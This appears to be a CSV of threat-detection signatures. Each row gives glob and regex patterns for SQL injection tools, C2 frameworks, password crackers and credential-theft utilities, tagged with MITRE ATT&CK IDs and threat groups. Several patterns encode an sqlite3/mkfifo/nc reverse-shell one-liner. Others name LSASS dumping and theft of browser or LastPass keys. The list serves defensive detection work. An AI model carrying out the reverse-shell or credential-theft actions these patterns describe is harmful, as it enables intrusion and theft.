"*SQLC2CMDS.dll*",".{0,1000}SQLC2CMDS\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","60053"
"*SqlClrPayload*",".{0,1000}SqlClrPayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60054"
"*sqldumper.py*",".{0,1000}sqldumper\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","60055"
"*sqli_common_shared.rb*",".{0,1000}sqli_common_shared\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60056"
"*Sqli-lab*",".{0,1000}Sqli\-lab.{0,1000}","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","N/A","10","5436","1532","2023-12-11T17:06:16Z","2012-05-19T19:41:26Z","60057"
"*SQL-Injection-Auth-Bypass-Payloads.*",".{0,1000}SQL\-Injection\-Auth\-Bypass\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","60058"
"*SQL-Injection-Libraries*",".{0,1000}SQL\-Injection\-Libraries.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60059"
"*SQL-Injection-Payloads.*",".{0,1000}SQL\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","60060"
"*SQLiPy.py*",".{0,1000}SQLiPy\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","60061"
"*SQLiScanner*",".{0,1000}SQLiScanner.{0,1000}","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Vulnerability Scanner","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","N/A","9","801","282","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z","60062"
"*sqlite:///ares.db*",".{0,1000}sqlite\:\/\/\/ares\.db.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","60063"
"*sqlite3 database/c2.db*",".{0,1000}sqlite3\sdatabase\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","60064"
"*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60065"
"*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/sh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/sh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60066"
"*sqlite3*/dev/null*'.shell*mkfifo*|""bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60067"
"*sqlite3*/dev/null*'.shell*mkfifo*|""cmd"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""cmd\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60068"
"*sqlite3*/dev/null*'.shell*mkfifo*|""powershell"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""powershell\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60069"
"*sqlite3*/dev/null*'.shell*mkfifo*|""pwsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""pwsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60070"
"*sqlite3*/dev/null*'.shell*mkfifo*|""zsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""zsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60071"
"*sqlite3*/dev/null*'.shell*mkfifo*|sh -i*|nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|sh\s\-i.{0,1000}\|nc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60072"
"*sqlmap -*",".{0,1000}sqlmap\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60073"
"*sqlmap --forms --batch -u *",".{0,1000}sqlmap\s\-\-forms\s\-\-batch\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60074"
"*sqlmap.conf*",".{0,1000}sqlmap\.conf.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60075"
"*sqlmap.py*",".{0,1000}sqlmap\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60076"
"*sqlmap.rb*",".{0,1000}sqlmap\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60077"
"*sqlmap/data/txt/wordlist.txt*",".{0,1000}sqlmap\/data\/txt\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60078"
"*sqlmap4burp*.jar*",".{0,1000}sqlmap4burp.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","60079"
"*sqlmapapi -*",".{0,1000}sqlmapapi\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60080"
"*sqlmapapi.py",".{0,1000}sqlmapapi\.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60081"
"*sqlmapapi.py*",".{0,1000}sqlmapapi\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1059 - T1213 - T1203","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","60082"
"*sqlmapproject/sqlmap*",".{0,1000}sqlmapproject\/sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","60083"
"*sqlmapproject/sqlmap/issues/2442*",".{0,1000}sqlmapproject\/sqlmap\/issues\/2442.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","60084"
"*SQLmate*",".{0,1000}SQLmate.{0,1000}","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Vulnerability Scanner","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","N/A","5","440","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z","60085"
"*sqlninja*",".{0,1000}sqlninja.{0,1000}","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60086"
"*SQLRecon.exe*",".{0,1000}SQLRecon\.exe.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","60087"
"*SQLRecon.git*",".{0,1000}SQLRecon\.git.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","60088"
"*SQLServer_Accessible_PotentialSensitiveData.txt*",".{0,1000}SQLServer_Accessible_PotentialSensitiveData\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60089"
"*SQLServer_DefaultLogin.txt*",".{0,1000}SQLServer_DefaultLogin\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60090"
"*src/cracker.*",".{0,1000}src\/cracker\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60091"
"*src/genmkvpwd.*",".{0,1000}src\/genmkvpwd\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60092"
"*src/john.asm*",".{0,1000}src\/john\.asm.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60094"
"*src/ligolo*",".{0,1000}src\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","60095"
"*src/obfuscator.c*",".{0,1000}src\/obfuscator\.c.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","60096"
"*src/Remote/chromeKey/*",".{0,1000}src\/Remote\/chromeKey\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60097"
"*src/Remote/lastpass/*",".{0,1000}src\/Remote\/lastpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60098"
"*src/Remote/sc_config/*",".{0,1000}src\/Remote\/sc_config\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60099"
